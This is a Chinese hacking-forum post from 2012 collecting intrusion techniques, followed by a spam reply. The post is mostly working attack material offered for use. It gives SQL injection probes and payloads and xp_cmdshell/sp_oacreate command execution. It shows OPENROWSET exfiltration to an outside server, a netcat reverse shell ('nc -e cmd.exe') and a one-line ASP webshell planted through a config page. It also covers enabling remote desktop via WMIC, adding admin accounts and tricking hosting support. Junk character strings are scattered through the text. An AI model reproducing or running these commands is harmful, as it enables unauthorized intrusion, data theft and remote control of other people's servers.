找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3425|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关: F% J1 S1 m, F6 l  U" V  ]

- [7 }6 z3 N! S# z4 A7 i' z
, q, k3 p7 Y7 r5 G2 C  S8 zSA点数据库分离搞法+语句:
  w  r% S2 g- m, p9 q$ D; ?; ]! u7 \4 f: Z; K
注射点不显错,执行下面三条语句页面都返回正常。" z# w9 `- u  a) j/ o8 J. n0 D
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
+ n( N/ d- {( S+ M: ^and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')+ ]# ~- j0 L' q
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')6 m5 V- o7 }5 C4 l; h; V. D9 ~
可以列目录,判断系统为2000,web与数据库分离
' J3 G* g. a* M3 F+ k遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
7 d) y! N$ q$ q5 }! x  ^7 r在注射点上执行% f3 h1 O3 R& x# r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
+ H' a& r( b' _( J页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP6 k. x. {4 g- {. D. b
还有我用NC监听得其他端口都没有得到IP。
  ?/ r0 }& u6 U6 @! Z! A6 ~
( C$ ?$ G( R% Z* _* A2 ^5 T- ~通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。1 o+ {1 [2 t6 O- N: ^
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--( S5 \# p! |0 a% K0 u( E7 U. d

: A% k1 I0 J' K# n;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--( t7 o0 s% i+ m( ~+ T- H

, g% C5 F$ E4 `! ~' s3 Y7 Y: i现在就猜想是不是数据库是内网而且不能连外网。
5 A7 N3 ^. n+ M+ G7 x
% {3 l+ s1 T; B1 x0 E$ @9 c- W& t' o) O0 i) W0 r
access导出txt文本代码
; c! v- i5 u% y" cSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
  W4 E4 K4 P. |) \1 M3 c" r- E# N5 F: X7 n  D. _
1 D3 l( W& D& V1 {# D4 t6 ^+ u% g1 E
1 R8 M' ?8 s: y
自动跳转到指定网站代码头4 q3 o5 {" g# g! ?  r- R
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
" i% |# T) G: r9 A
+ `" u7 X; h; Q6 b& [6 L1 d; J1 A  l6 y. C/ {) h$ ~( M
入侵java or jsp站点时默认配置文件路径:& @& A% E" M, e3 Y; Q& T
\web-inf\web.xml2 M% C, p! ^( J! @4 h5 T; G
tomcat下的配置文件位置:
/ Y9 o9 r6 t1 [1 D\conf\server.xml            (前面加上tomcat路径)
7 L0 i# a( g, S6 I, m3 S8 b/ ?\Tomcat 5.0\webapps\root\web-inf\struts-config.xml/ s5 t& C. ], {8 i+ P4 L
: ]1 J# p1 P: b5 t

2 O  [+ i( o$ G) |
$ [# V" f. \% ^( w检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:2 U3 X2 x+ b) I
-1%23
. v; I/ \3 p0 }# F5 G> - P. C* P! e1 \
<
! c! o. v" T! l! ?5 {* ~9 g; w1'+or+'1'='1; ^4 Q  V' J" U! X- K" n9 y
id=8%bf; s% I6 h- M4 y8 {! O. f- k

) h; N+ H8 T9 d) e全新注入点检测试法:' g! E3 H. N; t% _) f+ i# F
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
1 X6 w1 q3 v+ r0 w% k& S1 X  T- z2 u1 V% X2 ~' o! X' D
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
! t' h3 B/ v& p
2 I5 Q" E# Z/ H4 Z' n. K3 \搜索型注入判断方法:3 {, s/ V3 J+ F& P3 N
北京%' and '1'='1' and '%'='
. I6 h* Q  s3 I9 l( |) d北京%' and '1'='2' and '%'='
7 g0 }+ z, @7 g" `' V: y% T! l
3 b7 s. Y. S) l. p
* w" V& K0 `; `COOKIES注入:( s( M( {  \2 B' d8 H; ~, g) z
2 {4 D0 {2 W5 o; i: F( b' t0 `& ?
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
, M1 M3 `0 v# Z2 `! k7 k
2 C2 l; K9 @8 |" v0 P" C" O: U) u2000专业版查看本地登录用户命令:6 W( X1 w+ n4 y; V
net config workstation
" r: h0 \- s1 i( d: s. B! X7 P8 L6 ]

) e: V6 w8 {3 ]& e8 T# X2003下查看ipsec配置和默认防火墙配置命令:% U9 I, l' u; w  R% s' p
netsh firewall show config
. o+ `6 d  ~9 v( \netsh ipsec static show all6 z: e& K! N0 c) r( \
# `: }. L, t: I) m/ w
不指派指定策略命令:" |* p& `+ u, O7 t) D; \: }
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)8 ~5 q/ c6 }2 P3 ~6 c0 O2 k5 E
netsh ipsec static show policy all  显示策略名
2 d# ^$ J) ~$ ?- t5 M. Q' I
5 |6 E( P! L* `" ?6 l/ G7 ?# k
猜管理员后台小技巧:0 S* k) ^3 W. l% i" c- B
admin/left.asp 7 a% S/ o2 k& J
admin/main.asp' V5 d, V2 H' B% k5 v- k; i
admin/top.asp
" q- X7 m1 `7 zadmin/admin.asp ) F$ O3 ]( e- ]# }* X; T
会现出菜单导航,然后迅雷下载全部链接: `* b9 _' m- R# [6 t

/ A* p. l0 ~8 f; t# n$ D2 h
, i/ e' j$ {, D$ |- `2 X社会工程学:
9 B* m5 q  w/ O4 ]+ Z$ x用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人; B) d, [/ T6 C' s# v  H/ H
然后去骗客服. S% T9 W) S( \5 I) E

, T9 g: _! Q/ M- \
" B. |% q8 A. R- Y# m3 d! m统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: . p% v1 Q9 P3 P
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
2 l4 w/ G( ^& D/ m* F: F5 T  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。6 g; s# t4 u' K8 @) F4 z6 P
& t4 D2 d) e/ f) P# M

; c8 b- h& D0 Z' {# s0 V
- ?. v& @4 {! A  ]  B6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)( m3 G! ~# z7 P% M
5 X$ n" Y2 t$ @0 w
* Q2 t. P! R2 t& V9 Z
4 X& y6 E( y" j! I
CMD加密注册表位置+ X# A! j& o6 i+ H! R/ x
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor6 g' m3 K/ _( }
AutoRun: I# D5 G' B: n3 o3 \) I
- s: o1 |) @  \' y! {2 v% K) G
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor. ^& z. x+ O/ Z$ _  k$ t
AutoRun
) ^7 v0 a! t! M, Z
6 s- M) t1 G1 Q) e& m3 Q( u: ]+ b/ p
  T. S% c$ [6 f" O在找注入时搜索Hidden,把他改成test  Z9 a- ~; P) u9 Q. z

# r4 c+ D! h4 R: ^. P4 l9 }! Q
" |9 q/ n3 f2 e
  _7 P( t- \5 X/ ]$ Bmstsc /v:IP /console
0 o2 `3 @4 ~4 s* F1 q7 A3 E4 d/ P- p/ x' R9 l# ^' C

- f+ |! d: H' \# n( V- R: w+ u一句话开3389:* ?+ l) D7 L7 m, {4 o$ r  F, F) b! Q3 N

# T( ?0 n+ _0 C* {  O( W/ S最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  : `  }' y# ^7 I
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.% w" f# P7 B% f% ^
0 \" w- d( J1 R5 q& g5 n

5 k9 @- G  a2 N8 U5 |9 z, v% d知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:3 q1 N: n0 [3 G  @( ]9 A9 a. Y
Insert into admin(user,pwd) values('test','test')0 c! h5 V3 c+ f
/ ~+ o! k' n) }
8 c3 M' }( o2 e! |$ {
NC反弹
, r; r1 z( I! f! T& B  c先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   : w  P: ~- F1 b$ g; a; Q
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行): R, ]0 j) O1 x( u% T$ x( T
0 O$ n" g  N- p1 C) p8 L- G0 w2 I' E9 w
2 Q) t+ z  K& r- J) k
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
5 y- C  i- g5 T0 Y- Z1 O" n. ^/ ?1 ~! e8 d
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
# d0 C8 Y) @# C* N; A- h* i: }0 j( c例如:
9 d) C9 V7 m. P/ x/ K3 Zsubst k: d:\www\ 用d盘www目录替代k盘7 j6 ]  P( J& J, s) E
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表